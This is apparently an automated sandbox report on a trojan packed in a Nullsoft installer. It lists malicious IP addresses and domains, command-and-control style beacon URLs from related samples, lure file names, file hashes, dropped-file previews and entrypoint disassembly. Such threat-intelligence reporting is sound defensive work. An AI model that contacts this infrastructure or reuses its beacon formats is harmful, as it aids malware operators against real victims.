  • URL Reputation: safe
  • URL Reputation: safe
http://www.typography.netD | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://fontfabrik.com | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.founder.com.cn/cn | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.fontbureau.com/designers8 | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | high
http://www.fonts.com | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | high
http://www.sandoll.co.kr | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.urwpp.deDPlease | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.zhongyicts.com.cn | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
http://www.sakkal.com | explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmp | false | unknown
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
163.44.185.226 | www.tonton-koubou.com | Japan | 7506 | INTERQGMOInternetIncJP | true
104.21.37.16 | www.jabberjawmobile.com | United States | 13335 | CLOUDFLARENETUS | true
118.27.95.215 | www.yakudatsu-hikaku.com | Japan | 58649 | GMO-REG-NETGMOInternetIncJP | true
91.236.136.12 | www.formula-kuhni.com | Russian Federation | 44094 | WEBHOST1-ASRU | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | stacksyspro.net | United States | 15169 | GOOGLEUS | false
81.17.18.198 | www.xn--ol-xia.com | Switzerland | 51852 | PLI-ASCH | true
107.180.50.167 | alliedcds.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
103.86.176.10 | aksharnewtown.com | India | 133296 | WEBWERKS-AS-INWebWerksIndiaPvtLtdIN | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385307
Start date: 12.04.2021
Start time: 10:01:28
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 41s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 4oItdZkNOZ.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@15/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 26.3% (good quality ratio 24.2%)
• Quality average: 75.6%
• Quality standard deviation: 30.4%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.107.4.50, 104.43.193.48, 104.42.151.234, 8.241.79.126, 8.241.78.254, 8.241.83.126, 8.238.28.254, 8.241.89.126, 168.61.161.212, 184.30.24.56, 104.43.139.144, 13.88.21.125
• Excluded domains from analysis (whitelisted): fs.microsoft.com, 2-01-3cf7-0009.cdx.cedexis.net, c-0001.c-msedge.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, download.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, b1ns.c-0001.c-msedge.net, wu-fg-shim.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolcus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, b1ns.au-msedge.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context (the contacted URL of the associated sample is listed beneath each row)
163.44.185.226
  cV1uaQeOGg.exe | malicious
  • www.tonton-koubou.com/hx3a/?wV=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTReqSIU/XUQ&PRh0iv=SPxhAX6XM2BTb
  AQJEKNHnWK.exe | malicious
  • www.tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD
104.21.37.16
  Payment advice IN18663Q0031139I.xlsx | malicious
  • www.jabberjawmobile.com/hx3a/?MFNTHp=zXaxujox&qJE0=cNQmpavBJYLVVCP9fHUFAARwayWBvklnexWKCJ+eyAi/y3hLwATMTxpWtlohHCqG6Zjd3Q==
118.27.95.215
  cV1uaQeOGg.exe | malicious
  • www.yakudatsu-hikaku.com/hx3a/?wV=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ZPWQ3q+SwvL&PRh0iv=SPxhAX6XM2BTb
91.236.136.12
  AQJEKNHnWK.exe | malicious
23.227.38.74
  PAYMENT COPY.exe | malicious
  • www.cjaccessories.net/eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8
  Payment advice IN18663Q0031139I.xlsx | malicious
  • www.worldsabroad.com/hx3a/?qJE0=ByCcBdCDA9ynDZ0p2mvosMnRVFdtAJOL45GnySkY7pv3UdFI4qVYyr3+Nz+s3xG49ZTQ7g==&MFNTHp=zXaxujox
  winlog.exe | malicious
  • www.tagualove.com/uwec/?uzu8=4lE6ePOjgVOxQbKwmPb1ExKNrZ9hSDAusM8u/5C1B85TxEFkqvNdXJuLoKP4GsHywYGm&NjQhkT=8p44gXmp
  36ne6xnkop.exe | malicious
  • www.essentiallyourscandles.com/p2io/?1bVpY=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&TVg8Ar=tFNd1Vlhj2qp
  Pd0Tb0v0WW.exe | malicious
  • www.rideequihome.com/iu4d/?jBZ4=dYMXTz3oQAQLkNaLcUxsUovqIEfQQMeG6VLojiGd9Hw1vsxtxl1xN3dYL0Oy7pqqR6f8&1bz=WXrpCdsXv
  giATspz5dw.exe | malicious
  • www.squeakyslimes.com/a6ru/?OtZhTl=wZOPRxK8tpyPd&KzuD=lfMB28QesiJBcE5BXZRwN/zOtPplnlykGnT8TD32dw805CVoyQ8xbgtvqYaGqJpCt+n4lE3Dhg==
  IN18663Q0031139I.xlsx | malicious
  • www.recovatek.com/hx3a/?df=fCmUcBRkMsU23gyon11B/xiypSW2fUD8cUjfy08rELK4cGFPgnyxy77uL+u9ezJOoCatMA==&rJ=w0G8E6
  HG546092227865431209.exe | malicious
  • www.dollfaceextensionsllc.net/ct6a/?j2JHaJc=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA70CqXfonfR76&KthHT=LXaP
  Ref. PDF IGAPO17493.exe | malicious
  • www.trendyheld.com/edbs/?BbW=d74BDEXnxoADciMbQzj0eCjrMELcvf+wOrQFljwVZdGJg+vXDTJsALwkgrXDTrto9sU7&blX=yVCTVP0X
  pumYguna1i.exe | malicious
  • www.essentiallyourscandles.com/p2io/?uFNl=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&-ZSXw=ctxh_fYh
  0BAdCQQVtP.exe | malicious
  • www.busybeecreates.com/bei3/?8p=EZa0cv&2d=OGWfJfpUnHsdThEHHqOdnDkqqSd1vNA2rxr/ypdVXp7lfSasz7bxTgAFATjYM0d9Yd+JVdPS6Q==
  TazxfJHRhq.exe | malicious
  • www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu
  AQJEKNHnWK.exe | malicious
  • www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD
  payment.exe | malicious
  • www.moxa-pro.com/bei3/?Rl=M48tiJch&M4YDYvh=y7EZsd/VU66W5EPJYwX5Xfv+3DSZx1f1d6WAR6GRDy2o8Omo0ZsYhDvN6jXI6rbTZYPD
  Order.exe | malicious
  • www.woofytees.com/cugi/?BlL=guBtZ9/BZLKg3V3RSdvXg/8z1FJ37mZkFho76YC6dYQSBoV8kgYAqcCQ9vWS/DgnoPIa&EZXpx6=tXExBh8PdJwpH
  PO91361.exe | malicious
  • www.thegreenbattle.com/sb9r/?j2JhErl=WUvo38J/IHQ2cZDNQTpzQUKmli8iSC3X7FmX7RGR1rjI+erccOscsvK8+mo5h+9Qwsc2&NXf8l=AvBHWhTxsnkxJjj0
  RFQ11_ZIM2021pdf.exe | malicious
  • www.yourdadsamug.com/hmog/?U48Hj=FlcsoMQcYP8bHmq4bYup7jQaOgohKV4/DEyixY4WMPM8LbmuXu036xGPxLAWg/kNnOBQ&wP9=ndsh-n6
  1517679127365.exe | malicious
  • www.dollfaceextensionsllc.net/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA73iQHOIfF2a9
  W88AZXFGH.exe | malicious
  • www.oouuweee.com/klf/?VPXl=btTL_&ojPl=MYGgbBKqv4+u3e/kdP2Xd91vi4RM/aoA3smYuNxu5fW82Y1Oa+7PC+KK+eq77k+PBZt4nUhikw==
  OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exe | malicious
  • www.shopvivreluxe.com/smzu/?IB=XIQ4zU3AjC42PFCTOO37iro6/VjVaWUNsZ/SuojON2epSeHv79IyId/eqrs49S5DR7zK&ndlpdH=xPJtZdZP

Domains

Match | Associated Sample Name / URL | Detection | Context (the IP the associated sample resolved the domain to is listed beneath each row)
www.jabberjawmobile.com
  Payment advice IN18663Q0031139I.xlsx | malicious
  • 104.21.37.16
www.formula-kuhni.com
  AQJEKNHnWK.exe | malicious
  • 91.236.136.12
www.xn--ol-xia.com
  cV1uaQeOGg.exe | malicious
  • 81.17.18.196
  newordermx.exe | malicious
  • 81.17.18.198
www.tonton-koubou.com
  cV1uaQeOGg.exe | malicious
  • 163.44.185.226
  AQJEKNHnWK.exe | malicious
  • 163.44.185.226
www.yakudatsu-hikaku.com
  cV1uaQeOGg.exe | malicious
  • 118.27.95.215
shops.myshopify.com
  PAYMENT COPY.exe | malicious
  • 23.227.38.74
  Payment advice IN18663Q0031139I.xlsx | malicious
  • 23.227.38.74
  winlog.exe | malicious
  • 23.227.38.74
  36ne6xnkop.exe | malicious
  • 23.227.38.74
  Pd0Tb0v0WW.exe | malicious
  • 23.227.38.74
  giATspz5dw.exe | malicious
  • 23.227.38.74
  cV1uaQeOGg.exe | malicious
  • 23.227.38.74
  CNTR-NO-GLDU7267089.xlsx | malicious
  • 23.227.38.74
  IN18663Q0031139I.xlsx | malicious
  • 23.227.38.74
  HG546092227865431209.exe | malicious
  • 23.227.38.74
  Ref. PDF IGAPO17493.exe | malicious
  • 23.227.38.74
  pumYguna1i.exe | malicious
  • 23.227.38.74
  0BAdCQQVtP.exe | malicious
  • 23.227.38.74
  TazxfJHRhq.exe | malicious
  • 23.227.38.74
  AQJEKNHnWK.exe | malicious
  • 23.227.38.74
  New Order.exe | malicious
  • 23.227.38.74
  payment.exe | malicious
  • 23.227.38.74
  BL836477488575.exe | malicious
  • 23.227.38.74
  Order.exe | malicious
  • 23.227.38.74
  PO.exe | malicious
  • 23.227.38.74

                                                                        ASN

                                                                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                        CLOUDFLARENETUS | ieuHgdpuPo.exe | Get hash | malicious | Browse | 104.21.17.57
                                                                         | Cobro Juridico_0420198202_326828_4985792583130360_300690_8122300886764676459_5190713730838_pdf.exe | Get hash | malicious | Browse | 172.67.222.176
                                                                         | Payment Slip.doc | Get hash | malicious | Browse | 104.21.17.57
                                                                         | Cobro Juridico_0291662728_7023446_452487041454723_016698_5192136884256735776_2301761820735_pdf.exe | Get hash | malicious | Browse | 104.21.17.57
                                                                         | INQUIRY 1820521 pdf.exe | Get hash | malicious | Browse | 104.21.82.58
                                                                         | PaymentCopy.vbs | Get hash | malicious | Browse | 172.67.222.131
                                                                         | PAYMENT COPY.exe | Get hash | malicious | Browse | 104.21.28.135
                                                                         | PO NUMBER 3120386 3120393 SIGNED.exe | Get hash | malicious | Browse | 1.2.3.4
                                                                         | Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exe | Get hash | malicious | Browse | 172.67.222.176
                                                                         | BL2659618800638119374.xls.exe | Get hash | malicious | Browse | 172.67.222.176
                                                                         | Purchase order and quote confirmation.exe | Get hash | malicious | Browse | 172.67.222.176
                                                                         | Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exe | Get hash | malicious | Browse | 172.67.188.154
                                                                         | Re Confirm#U00ffthe invoice#U00ffthe payment slip.exe | Get hash | malicious | Browse | 104.21.17.57
                                                                         | SOA.exe | Get hash | malicious | Browse | 104.21.19.200
                                                                         | RFQ No A'4762GHTECHNICAL DETAILS.exe | Get hash | malicious | Browse | 104.21.19.200
                                                                         | GQ5JvPEI6c.exe | Get hash | malicious | Browse | 104.21.17.57
                                                                         | setupapp.exe | Get hash | malicious | Browse | 172.67.164.1
                                                                         | g2qwgG2xbe.exe | Get hash | malicious | Browse | 172.67.161.4
                                                                         | C++ Dropper.exe | Get hash | malicious | Browse | 104.21.50.92
                                                                         | 12042021493876783,xlsx.exe | Get hash | malicious | Browse | 23.227.38.65
                                                                        INTERQGMOInternetIncJP | g2qwgG2xbe.exe | Get hash | malicious | Browse | 163.44.239.73
                                                                         | 36ne6xnkop.exe | Get hash | malicious | Browse | 163.44.239.73
                                                                         | 1ucvVfbHnD.exe | Get hash | malicious | Browse | 163.44.239.73
                                                                         | cV1uaQeOGg.exe | Get hash | malicious | Browse | 163.44.185.226
                                                                         | Customer-100912288113.xlsx | Get hash | malicious | Browse | 163.44.239.73
                                                                         | LWlcpDjYIQ.exe | Get hash | malicious | Browse | 118.27.122.19
                                                                         | pumYguna1i.exe | Get hash | malicious | Browse | 163.44.239.73
                                                                         | AQJEKNHnWK.exe | Get hash | malicious | Browse | 163.44.185.226
                                                                         | PRC-20-518 ORIGINAL.xlsx | Get hash | malicious | Browse | 150.95.52.74
                                                                         | DYANAMIC Inquiry.xlsx | Get hash | malicious | Browse | 163.44.239.73
                                                                         | pvUopSIi7C5Eklw.exe | Get hash | malicious | Browse | 163.44.239.72
                                                                         | BL-2010403L.exe | Get hash | malicious | Browse | 118.27.99.27
                                                                         | INV-210318L.exe | Get hash | malicious | Browse | 118.27.99.27
                                                                         | g0g865fQ2S.exe | Get hash | malicious | Browse | 163.44.239.73
                                                                         | oQJT5eueEX.exe | Get hash | malicious | Browse | 150.95.255.38
                                                                         | Invoice.xlsx | Get hash | malicious | Browse | 150.95.255.38
                                                                         | MACHINE SPECIFICATION.exe | Get hash | malicious | Browse | 118.27.99.20
                                                                         | 4xMdbgzeJQ.exe | Get hash | malicious | Browse | 150.95.255.38
                                                                         | Q1VDYnqeBX.exe | Get hash | malicious | Browse | 163.44.239.73
                                                                         | products order pdf.exe | Get hash | malicious | Browse | 163.44.239.73
                                                                        WEBHOST1-ASRU | AQJEKNHnWK.exe | Get hash | malicious | Browse | 91.236.136.12
                                                                         | i9EG6zNNQf.exe | Get hash | malicious | Browse | 45.138.157.212
                                                                         | zfeISnMIsM.exe | Get hash | malicious | Browse | 45.153.231.219
                                                                         | 0y5uGFovqp.exe | Get hash | malicious | Browse | 45.153.231.219
                                                                         | bid,12.17.2020.doc | Get hash | malicious | Browse | 193.201.126.102
                                                                         | bid,12.17.2020.doc | Get hash | malicious | Browse | 193.201.126.102
                                                                         | bid,12.17.2020.doc | Get hash | malicious | Browse | 193.201.126.102
                                                                         | specifics,12.16.2020.doc | Get hash | malicious | Browse | 193.201.126.102
                                                                         | specifics,12.16.2020.doc | Get hash | malicious | Browse | 193.201.126.102
                                                                         | specifics,12.16.2020.doc | Get hash | malicious | Browse | 193.201.126.102
                                                                         | certificate-12.16.2020.doc | Get hash | malicious | Browse | 193.201.126.114
                                                                         | certificate-12.16.2020.doc | Get hash | malicious | Browse | 193.201.126.114
                                                                         | certificate-12.16.2020.doc | Get hash | malicious | Browse | 193.201.126.114
                                                                         | enjoin 12.16.20.doc | Get hash | malicious | Browse | 193.201.126.93
                                                                         | enjoin 12.16.20.doc | Get hash | malicious | Browse | 193.201.126.93
                                                                         | enjoin 12.16.20.doc | Get hash | malicious | Browse | 193.201.126.93
                                                                         | index.hta | Get hash | malicious | Browse | 193.201.126.34
                                                                         | http://phfvg141cruel.com/analytics/LSQwD5t2BeUGnP/G8_qFgBBGbZjcd8JDXL8c8GstBjE4NUfsHd/zzfp3?hHhX=DHLSFDKlZVUUrAz&ZZnZZ=IeACrr_VRiWdZf_&IEVY=TTWUhlBkEBZi&rKHt=qiYWQbrbKzG | Get hash | malicious | Browse | 193.201.126.34
                                                                         | legislate-12.20.doc | Get hash | malicious | Browse | 193.201.126.34
                                                                         | legislate-12.20.doc | Get hash | malicious | Browse | 193.201.126.34
                                                                        GMO-REG-NETGMOInternetIncJP | cV1uaQeOGg.exe | Get hash | malicious | Browse | 118.27.95.215

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                        C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dll | Payment advice IN18663Q0031139I.xlsx | Get hash | malicious | Browse |

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Temp\dxcetsy85d610a164hb
                                                                          Process:C:\Users\user\Desktop\4oItdZkNOZ.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):164864
                                                                          Entropy (8bit):7.9989537199070995
                                                                          Encrypted:true
                                                                          SSDEEP:3072:eCYqJ+rFV8CkMMTx5jRABnPOs9fsZJ9POz9v9qB0kN3Wtlyf7TB2o8bXqysuN:j0V8CvM7lSPOs90Zuz9QDN3OloB8TB
                                                                          MD5:66F630975828C988D10147947A6066FC
                                                                          SHA1:9F3BE969B7AACE3B0A9D6CE76C33C6BF3B94801E
                                                                          SHA-256:5AF320BE1022A920E036C4218414C439DF65F9100CB772CBCDE715CCB5353C19
                                                                          SHA-512:0E4B4A5346286B43D4C6A890843210B55E323AE1D05D5378A6FA73B7AA81D26153529DD32436D3F92FD6789BA8398F423EF05CDF69D3B5B9F5A5B1CF531A7F1B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: ?.....c...8T..P).....}a.=.....kO3^W....;...{<i...j..,....8..p..b8[M.P..H.]X.i_3...|kR7.<.Y..L.r..tph@#yp.<WK.._.u$..b.....E..,~"2N.(..j...o...t.4h.....m...n.R..a..,...58....u3Tu|I....X...B...c....Ez.....Q|..xHU6."<.....7ZZ.|.bM.....B.k.H....n...Pf4...$.7.5.Y..r*//q.\..p...%hT..*^..G...>..3.qm.j....Cd....X...u...\ux..qcg.H..,.+G..0v.....BV.....y.F,.....`@6.sC.Z.N=X.....>^..Z.\Q.|...q}..#.@...a......"..k...kA......,Y..UXXDr...@Wl..N.,..+..x...p....X..$&:.e.o?..X..q .x..#..g..1..6.e...-.......WGf....9..%.}.A... R.....>..b...v...$..v{5^%..^\..l|.O.$.J.}.._q~p..c.u....mU...@X..EVu..a.g9n..........."/....7P.j.d;i2d[...z"......k.R.Yl.}IhR#uR..][o;}.E...{.i....M..U...4s.KJE.n|.......j........o.Y.Ug".H&.&uw....)G....z..._...b.....^:D.}fw.p$.].$. <.)...X...k........5R.&.t._.....f..=iT" .....J..N..H.............q.g.d.w9[.3.....l.....=t...QS..........d4..pm.H.....@.h.<.=..o..7.p..N>x.f./....TC..l..2F..6.^..xRw=..jg..M..Bs'9.)._.*......Z...-<..V>X
                                                                          C:\Users\user\AppData\Local\Temp\eh2api3cxcp4
                                                                          Process:C:\Users\user\Desktop\4oItdZkNOZ.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6661
                                                                          Entropy (8bit):7.95283900519363
                                                                          Encrypted:false
                                                                          SSDEEP:96:3a5irTx9nq7Pa8uVcysMEG8aCTrAK40vPUojz3NfsX2qhmOe77wN6EB:3a5M9nqT/uidzacvPUojz9tvDPwN6EB
                                                                          MD5:97F97CF558ABBDF02D80BD9BE6E6E007
                                                                          SHA1:A02112C110F988A0C2567A3E1732CD8AAC8863F7
                                                                          SHA-256:535934F5D314EED051264A6D1D24542B551E0A1AD738FECF7A26E18B7520419D
                                                                          SHA-512:29CD3852A2F4A64D055BAE82E7A1F036C98BC684190CED8A8EE3F396BE8F626E5B7ABA15B6F60F185842F938A0B086F203273530A9C74945FA1DC100105E0FA6
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: ).`qH..G#Yl..M........rpg.u....`^B."4D....2....:...%..<.P...........,.;...6K....UR#...I......lb. ...t.V.X.[l.&{...Q..I<}T..gctW..0..w2..(....h/..J...}M..&o.s...oG.C..].c...{Y.l..$.......Xk..;U;V.5..=..B.c1...i.].%.R.],..~.ET}ne.....Tw.W.-......sW......t...M..3...C,vfV.rMu..bBx.k...@O.q..FT..?......;..`.A!{A].v.l.Os.v.....7).tC.q ..>.../.XI...^YO.!................(%TB gs..Z..A...~J.j.6\2yE...8..q.[c.x..\!.I3..c.hk....q..5.S.`..qCz.....8.....%.s...d.\f....-..y..o:.....'.`.Tw...8.j..#<<.X...8...1j.^.........X......'....1...@.y^s..}...9...*R."^.C......6...a...u...Gq%]......-...+w...=..w...].........BI.=~[%..).#G.X....>....?....J.?5^.o8...P.Ii.$2...D..M.hv.1..`S..u.....=...m.I..Z..?........ xI.h.!Z...ETQ.K........>r...........*J...1#.Z.1.,0.A.9$.0.2.'...Q..dp..H..k......jR.Y.R2".~...J..+..u1@...r...~t...f..s>....Y6..j.2.o...+...8fehK~w....?.Z.'J..T8..D.9.Xv...........J....1.8.H.O.!.+.}.g......N.l.}..]....q....W.T.....p./..2..d.!..R...d.y.[
                                                                          C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dll
                                                                          Process:C:\Users\user\Desktop\4oItdZkNOZ.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):5632
                                                                          Entropy (8bit):4.079886237854097
                                                                          Encrypted:false
                                                                          SSDEEP:48:a97y2RN2yedcWZhfChEsHIGmEsH/Gt4BKiZ/seNkTHfav6yYZmEeSRuqS:1Eidj4IGN4/GCBKxfQKuix
                                                                          MD5:0FE614493EC9FBF1C2A1D80C94BD82E4
                                                                          SHA1:3090FD37896D3A4D2FA8AA6EE6536BFA415C5253
                                                                          SHA-256:29943F203F544CD1F2B51396E1B371B017B705A3D43FF16E3A8FCC7350E629D9
                                                                          SHA-512:07360B40C2D2FF6E7CD1FC0D6E78D60E62677607C0C85FA62705EEA1F53A8844B1E51CD5E91E7ECED53F601FFEBC30A6A9002CA1EB62F68613D38C9DE9D5A0EC
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 10%
                                                                          Joe Sandbox View:
                                                                          • Filename: Payment advice IN18663Q0031139I.xlsx, Detection: malicious, Browse
                                                                          Reputation:low
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5K..fK..fK..f_..gZ..fK..fw..f...gJ..f...gJ..f..{fJ..f...gJ..fRichK..f........................PE..L...T.s`...........!......................... ...............................`............@.........................@ ..P....1.......@.......................P...... ...............................................0...............................code...!........................... ....data...l.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.020348156679716
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:4oItdZkNOZ.exe
                                                                          File size:394513
                                                                          MD5:36cf33e57ccccf3754b57ab14e623e57
                                                                          SHA1:f54422966fd1e5f8180f618a51c938372d3711be
                                                                          SHA256:9914c8ad9ea0318f57214c6eb2f2e3f891b71ba054a9de071432ec92eb6bfe0d
                                                                          SHA512:4eb8e5e6d3a24853496318816f038d987571e6f8fbf1b6308e0539f679a89baa85f548dd465a346ae6772ae68164edb0fe2d660c8eef70a880b8f0235724372e
                                                                          SSDEEP:6144:bd5+vAz3kwJcM25Py5Dniq2GMo0V8CvM7lSPOs90Zuz9QDN3OloB8Te:ivAz3kwJB0OBSDiYWDdOmCe
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....<.....J1.....

                                                                          File Icon

                                                                          Icon Hash:c4c0c4dc9ccc6eb4

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x40314a
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                          DLL Characteristics:
                                                                          Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          sub esp, 0000017Ch
                                                                          push ebx
                                                                          push ebp
                                                                          push esi
                                                                          xor esi, esi
                                                                          push edi
                                                                          mov dword ptr [esp+18h], esi
                                                                          mov ebp, 00409240h
                                                                          mov byte ptr [esp+10h], 00000020h
                                                                          call dword ptr [00407030h]
                                                                          push esi
                                                                          call dword ptr [00407270h]
                                                                          mov dword ptr [007A3030h], eax
                                                                          push esi
                                                                          lea eax, dword ptr [esp+30h]
                                                                          push 00000160h
                                                                          push eax
                                                                          push esi
                                                                          push 0079E540h
                                                                          call dword ptr [00407158h]
                                                                          push 00409230h
                                                                          push 007A2780h
                                                                          call 00007F819CA242C8h
                                                                          mov ebx, 007AA400h
                                                                          push ebx
                                                                          push 00000400h
                                                                          call dword ptr [004070B4h]
                                                                          call 00007F819CA21A09h
                                                                          test eax, eax
                                                                          jne 00007F819CA21AC6h
                                                                          push 000003FBh
                                                                          push ebx
                                                                          call dword ptr [004070B0h]
                                                                          push 00409228h
                                                                          push ebx
